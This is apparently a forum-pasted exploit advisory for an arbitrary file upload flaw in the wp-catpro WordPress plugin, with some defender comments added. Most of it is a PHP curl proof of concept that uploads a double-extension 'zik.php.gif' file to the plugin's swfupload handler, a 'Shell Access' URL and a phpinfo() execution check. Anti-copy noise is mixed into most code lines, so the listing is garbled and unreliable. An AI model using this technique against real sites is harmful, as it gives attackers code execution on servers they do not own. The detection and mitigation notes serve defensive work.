WordPress plugin - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-162
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
<?php9 e2 P6 u$ s( m% c7 R$ O
// Advisory proof-of-concept: a single multipart POST to the upload handler the
// plugin ships inside its bundled swfupload directory. The listing is a forum
// paste with anti-copy noise interleaved in most lines; it is kept as pasted.
//
// File sent. The double extension is the whole point: per the config quoted
// above, only jpg/gif/png are allowed, and the final suffix passes that check
// while the stored name still contains ".php".
9 U+ X. N3 Q+ ?* x; w0 A; ~$uploadfile="zik.php.gif";
// Target is upload.php under wp-content/plugins/wp-catpro/js/swfupload/js/.
// Defender note: a POST to that path carrying a multipart "Filedata" part is
// the request shape to look for in access logs and WAF rules; whether the
// handler requires any authentication is not shown on this page.
) G/ X3 c; ]" S( s7 m( c1 @$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");7 W7 e4 [, k. d7 Z& ]+ D# J
curl_setopt($ch, CURLOPT_POST, true);
// Two form fields: Filedata (the file contents; the "@path" form is the legacy
// curl upload marker) and folder, a destination directory chosen by the client.
// NOTE(review): whether upload.php validates "folder" is not visible here;
// a client-supplied destination path has to be treated as untrusted input.
* [. n1 w' T' W2 z$ Hcurl_setopt($ch, CURLOPT_POSTFIELDS,
, A# k) K. D Y% c8 varray('Filedata'=>"@$uploadfile",7 | r6 W3 |' n
'folder'=>'/wp-content/uploads/catpro/'));0 Z4 i/ c& A2 h6 M" z6 K( g, Q
// Capture the handler's response body instead of echoing it; printed below.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);2 U6 i" g& v/ C. P, S
$postResult = curl_exec($ch);1 q( s2 }7 n* l' [1 D0 ~
curl_close($ch);
7 V4 d5 k# x' K' M
( [- b8 T3 W1 q& y( h* iprint "$postResult";5 @$ a; V" c2 `3 b' b
// Bare text inside the PHP tags (not valid PHP as pasted): the advisory's
// claimed location of the stored file under wp-content/uploads/catpro/.
// NOTE(review): a name ending in ".php.gif" runs as PHP only where the web
// server's handler matches "php" as a non-final extension (e.g. an Apache
// AddHandler/AddType mapping without an end anchor). Mitigations that do not
// depend on the plugin's extension list: validate the whole filename rather
// than the last suffix, normalise the stored name to a single allowed
// extension, and disable script execution for the uploads tree.
M) J" l0 a- I+ ^! ?' ~Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif o/ C8 p+ B3 ]; I; b7 V* V
?>
& [0 G1 T1 f' _+ N$ q R0 b4 @<?php
// Contents of the test file the advisory uploads: a phpinfo() call used as an
// execution check. Defender note: phpinfo() output served from the uploads
// tree is a direct indicator that script execution is enabled there.
7 R& l5 |- t1 N" cphpinfo();
4 D. `- R: n! r4 g% \6 u& u) a?> |